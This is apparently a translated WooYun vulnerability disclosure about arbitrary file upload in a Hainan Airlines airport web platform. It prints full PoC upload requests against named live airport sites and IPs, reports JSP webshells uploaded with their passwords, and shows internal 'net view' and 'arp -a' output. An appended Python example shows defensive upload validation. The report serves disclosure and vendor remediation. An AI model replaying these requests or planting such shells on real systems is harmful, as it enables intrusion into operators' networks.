
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0160831

Title: Two generic arbitrary file upload issues in a Hainan Airlines custom management platform (bundled)

Vendor: Hainan Airlines

Author: 路人甲

Submitted: 2015-12-12 22:05

Fixed: 2016-01-25 18:01

Published: 2016-01-25 18:01

Type: Command execution

Severity: High

Self-rated rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-12-12: Details reported to the vendor, awaiting vendor handling
2015-12-14: Vendor confirmed; details disclosed to the vendor only
2015-12-24: Details disclosed to core white hats and relevant domain experts
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to intern white hats
2016-01-25: Details disclosed to the public

Brief description:

Two generic arbitrary file upload issues, bundled. Supporting HNA; asking for 20 rank to help feed the family.

Detailed description:

WooYun: Hainan Airlines custom management platform generic vulnerability bundle (getshell), an earlier report by someone else
Today's topic is not FCK (FCK has been fixed) but the arbitrary file upload inside the system itself.
Taking the Haikou Meilan International Airport main site as the example (IP: 221.11.139.164)
http://www.mlairport.com/autoweb/autoweb/ml_index.html

[Screenshot: QQ截图20151212202123.png]


HNA airport website content management platform

[Screenshot: QQ截图20151212202335.png]


Upload point 1

http://www.mlairport.com/autoportal/AlbumUpload


Constructed PoC

POST http://www.mlairport.com/autoportal/AlbumUpload HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer:
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7de11c161e01e4
UA-CPU: x86
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: www.mlairport.com
Content-Length: 10179
Connection: Keep-Alive
-----------------------------7de11c161e01e4
Content-Disposition: form-data; name="NewFile"; filename="E:\wooyun.jsp"
Content-Type: application/octet-stream
wooyun test
-----------------------------7de11c161e01e4--


[Screenshot: QQ截图20151212203204.png]


The response contains the absolute path

D:\jboss-4.2.2.GA\server\default\.\deploy\autoportal.ear\autoweb.war\autoweb\fujian\20151212203041_wooyun.jsp


That is, http://www.mlairport.com/autoweb/autoweb/fujian/20151212203041_wooyun.jsp

[Screenshot: QQ截图20151212203306.png]


Trying to upload a shell

http://www.mlairport.com/autoweb/autoweb/fujian/20151212203041_wooyun.jsp


Password: woo0yun

[Screenshot: QQ截图20151212203348.png]


D:\jboss-4.2.2.GA\server\default\.\deploy\autoportal.ear\autoweb.war\autoweb\autoweb\fujian\> net view
服务器名称 注释
-------------------------------------------------------------------------------
\\20YEARSRVHK01
\\AGRSRVHK01
\\BWCSRVHK03
\\BWCSRVHK04
\\CHGYSRVHK01
\\DLRSRVHK01
\\DNSSRVHK01
\\EAISRVHK03
\\ECGSRVHK01
\\ECGSRVHK02
\\ECGSRVHK05
\\ECGSRVHK06
\\ECGSRVHK07
\\ECGSRVHK08
\\EDGE
\\EDGE2
\\EDGEHK03
\\EFBAPPSRVHK01
\\EFBAPPSRVHK02
\\EGRPSRVHK01
\\EHMOBILESRVHK01
\\FFPSRVHK02
\\FTMSWEBSRVHK01
\\GASRVHK01
\\GCBSRVHK02
\\GROSRVHK03
\\GROSRVHK04
\\GTFVSRVHK01
\\GTFVSRVHK01_BAK
\\HELPSRVHK01
\\HNAIR-1485DCBA0
\\HNAIR-19DDE6F9F
\\HNAIR-2847999AA
\\HNAIR-315575FF0
\\HNAIR-619B2682B
\\HNAIR-6293EC6FC
\\HNAIR-764E11C03
\\HNAIR-8277FEBE4
\\HNAIR-8B244A893
\\HNAIR-A490FF226
\\HNAIR-CC28EB467
\\HNAIR-E55CA2284
\\HNAIR-EF037F934
\\HNAIR-MEILAN
\\HNAREAL
\\HWOPCSRVHK01
\\HWWEBSRVHK01
\\IECSRVHK01
\\INTSRVHK01
\\INTSRVHK02
\\JWGLSRVHK01
\\LYEDSRVHK01
\\LYEDSRVHK02
\\LYTMSRVHK02
\\MOBILEESBSERVER
\\MONITOR01
\\PHWSRVHK01
\\PPMSRVHK02
\\SCB_SFTP
\\SMG4SRVHK04
\\SMSSRVHK03
\\SSOSRVHK01
\\SSOSRVHK04 ssosrvhk04
\\TICSRVHK02
\\VMW-BDTWEB
\\VMW-GZWXH
\\WEIXIN-PLAT
\\WIN-6LJ8ESOHO31
\\WIN-N5QNAF0JSM5
\\YWXTWEB
\\ZXWEBSRVHK01
命令成功完成。
系统找不到指定的路径。
D:\jboss-4.2.2.GA\bin\> arp -a
Interface: 10.1.1.45 --- 0x10003
Internet Address Physical Address Type
10.1.1.1 00-1f-9e-bc-ad-a6 dynamic
10.1.1.151 00-50-56-89-00-86 dynamic
10.1.1.228 18-a9-05-72-69-58 dynamic


The internal network is reachable; you know what that means.

[Screenshot: QQ截图20151212203455.png]


Upload point 2

http://www.mlairport.com/autoportal/ImageUpload


Constructed PoC

POST http://www.mlairport.com/autoportal/ImageUpload HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer:
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7de11c161e01e4
UA-CPU: x86
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: www.mlairport.com
Content-Length: 10175
Connection: Keep-Alive
-----------------------------7de11c161e01e4
Content-Disposition: form-data; name="file"; filename="E:\wooyun.jsp"
Content-Type: application/octet-stream
wooyun test1
-----------------------------7de11c161e01e4--


[Screenshot: QQ截图20151212203910.png]


The response contains the path, but note that the returned path is wrong: a / is missing.
The correct path is fujian\big\*.jsp

http://www.mlairport.com/autoweb/autoweb/fujian/big/20151212203744_wooyun.jsp


[Screenshot: QQ截图20151212204038.png]

Proof of vulnerability:

Other cases
Yichang Sanxia Airport http://www.sanxiaairport.com/

[Screenshot: QQ截图20151212204325.png]


I uploaded a JSP directly as a test

[Screenshot: QQ截图20151212204425.png]


POST http://www.sanxiaairport.com/autoportal/AlbumUpload HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer:
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7de11c161e01e4
UA-CPU: x86
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: www.sanxiaairport.com
Content-Length: 219
Connection: Keep-Alive
-----------------------------7de11c161e01e4
Content-Disposition: form-data; name="NewFile"; filename="E:\wooyun.jsp"
Content-Type: application/octet-stream
wooyun test
-----------------------------7de11c161e01e4--


Test JSP text file from upload point 1 (file content: wooyun test) http://www.sanxiaairport.com/autoweb/autoweb/fujian/20151212204207_wooyun.jsp

[Screenshot: QQ截图20151212204538.png]


Test JSP text file from upload point 1 (file content: wooyun test1)
Upload point 2

POST http://www.sanxiaairport.com/autoportal/ImageUpload HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer:
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7de11c161e01e4
UA-CPU: x86
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: www.sanxiaairport.com
Content-Length: 217
Connection: Keep-Alive
-----------------------------7de11c161e01e4
Content-Disposition: form-data; name="file"; filename="E:\wooyun.jsp"
Content-Type: application/octet-stream
wooyun test1
-----------------------------7de11c161e01e4--


[Screenshot: QQ截图20151212204806.png]


http://www.sanxiaairport.com/autoweb/autoweb/fujian/big/20151212204550_wooyun.jsp

[Screenshot: QQ截图20151212204846.png]


Uploading a one-line shell
http://www.sanyaairport.com/autoweb/autoweb/fujian/big/20151212205457_wooyun.jsp
Password: pandas

[Screenshot: QQ截图20151212205803.png]


Other cases

http://202.100.200.73/autoportal/LoginForm.jsp
Although it says access is not permitted, uploading still works without any trouble.


[Screenshot: QQ截图20151212205935.png]


Uploaded text file
http://202.100.200.73/autoweb/autoweb/fujian/20151212205827_wooyun.jsp

[Screenshot: QQ截图20151212210121.png]


[Screenshot: QQ截图20151212210244.png]


http://202.100.200.73/autoweb/autoweb/fujian/big/20151212210029_wooyun.jsp

[Screenshot: QQ截图20151212210319.png]


http://202.100.200.203/autoportal/LoginForm.jsp


[Screenshot: QQ截图20151212210626.png]


[Screenshot: QQ截图20151212210724.png]


http://202.100.200.203/autoweb/autoweb/fujian/big/20151212210604_wooyun.jsp

[Screenshot: QQ截图20151212210803.png]


[Screenshot: QQ截图20151212210912.png]


http://202.100.200.203/autoweb/autoweb/fujian/20151212210753_wooyun.jsp

[Screenshot: QQ截图20151212210929.png]


http://www.mzlairport.net (IP: 114.251.243.65)

[Screenshot: QQ截图20151212211114.png]


[Screenshot: QQ截图20151212211231.png]


http://www.mzlairport.net/autoweb/autoweb/fujian/20151212211020_wooyun.jsp

[Screenshot: QQ截图20151212211307.png]


[Screenshot: QQ截图20151212211353.png]


http://www.mzlairport.net/autoweb/autoweb/fujian/big/20151212211146_wooyun.jsp

[Screenshot: QQ截图20151212211418.png]


That is all.

Fix recommendation:

Filter at the upload points
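The fix line says only that the upload points need filtering. The block below is an added example written for this page, not code from the report or from the affected platform, showing what such a filter has to do for both upload points (AlbumUpload and ImageUpload) given the PoC requests shown above: reduce the client-supplied filename (E:\wooyun.jsp in the PoC) to an allowlisted image extension, check the file signature instead of trusting the client's Content-Type, store the file under a random name in a directory outside the deployed web application so nothing uploaded can be served as JSP, and never echo the absolute storage path back to the client (the report shows the endpoints returning the D:\jboss-... path). It is written in Python rather than the platform's Java so the checks can be exercised offline; ALLOWED_TYPES, UPLOAD_DIR, handle_upload and build_body are this example's own names and assumptions, and the multipart bodies are constructed to match the PoC's layout.

```python
"""Server-side checks for a multipart file upload endpoint.

Added example for this page, not the affected platform's code. It parses a
multipart/form-data body shaped like the report's PoC and applies the checks
implied by "filter at the upload points". ALLOWED_TYPES, UPLOAD_DIR,
handle_upload and build_body are this example's own names/assumptions.
"""
import os
import re
import secrets
from email.parser import BytesParser

# Allowlisted extensions and the file signature each must begin with.
# .jsp/.war/.html are simply absent from the map, so they can never be stored.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}
UPLOAD_DIR = "/srv/uploads"  # assumed location, outside the deployed web app

# Same boundary as the report's PoC; used here only to build constructed bodies.
BOUNDARY = "---------------------------7de11c161e01e4"
CONTENT_TYPE = f"multipart/form-data; boundary={BOUNDARY}"


class UploadRejected(ValueError):
    pass


def parse_multipart(content_type, body):
    """Return (field_name, filename, data) for each part of a multipart
    body, using the stdlib MIME parser (same grammar as form-data)."""
    head = f"Content-Type: {content_type}\r\n\r\n".encode()
    msg = BytesParser().parsebytes(head + body)
    if not msg.is_multipart():
        raise UploadRejected("body is not multipart/form-data")
    return [
        (part.get_param("name", header="content-disposition"),
         part.get_filename(),
         part.get_payload(decode=True) or b"")
        for part in msg.get_payload()
    ]


def vetted_extension(client_filename):
    """Reduce the untrusted filename to an allowlisted extension. Drive
    letters, directories and both separator styles ('E:\\wooyun.jsp' in the
    PoC) are discarded first; only the last extension counts, so
    'x.gif.jsp' is still '.jsp' and is refused."""
    base = re.split(r"[\\/]", client_filename)[-1]
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension not allowed: {ext or '(none)'}")
    return ext


def check_signature(data, ext):
    """The client's Content-Type header is ignored; the bytes must match."""
    if not data.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected("file signature does not match " + ext)


def handle_upload(content_type, body, field="file"):
    """Validate the named file part and return the opaque name the server may
    reveal: random hex plus the vetted extension, never the absolute path."""
    try:
        for name, filename, data in parse_multipart(content_type, body):
            if name != field or filename is None:
                continue
            ext = vetted_extension(filename)
            check_signature(data, ext)
            stored = secrets.token_hex(16) + ext
            # A real handler writes data to os.path.join(UPLOAD_DIR, stored);
            # the write is omitted so this example runs without touching disk.
            return {"accepted": True, "name": stored}
        raise UploadRejected(f"no file part named {field!r}")
    except UploadRejected as exc:
        return {"accepted": False, "error": str(exc)}


def build_body(field, filename, data):
    """Constructed multipart body in the shape of the report's PoC."""
    return (
        f"--{BOUNDARY}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode() + data + f"\r\n--{BOUNDARY}--\r\n".encode()


if __name__ == "__main__":
    # The PoC's upload (a .jsp with a Windows path as its name) is refused,
    # while a genuine GIF receives an opaque name with no path information.
    poc = build_body("NewFile", "E:\\wooyun.jsp", b"wooyun test")
    print(handle_upload(CONTENT_TYPE, poc, field="NewFile"))
    gif = build_body("file", "photo.gif", b"GIF89a" + b"\x00" * 10)
    print(handle_upload(CONTENT_TYPE, gif))
```

The design point is that each check is independent of the others: the extension allowlist alone would still accept a .gif whose bytes are not an image, the signature check alone would still let the client choose the stored name and path, and returning an opaque name alone would still leave executable content inside the web root. All four together are what "filter at the upload points" has to mean for these endpoints.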

Copyright notice: when reposting, please credit the source: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 13

Confirmed at: 2015-12-14 09:26

Vendor reply:

Thank you very much; we will arrange the fix immediately.

Latest status:

None yet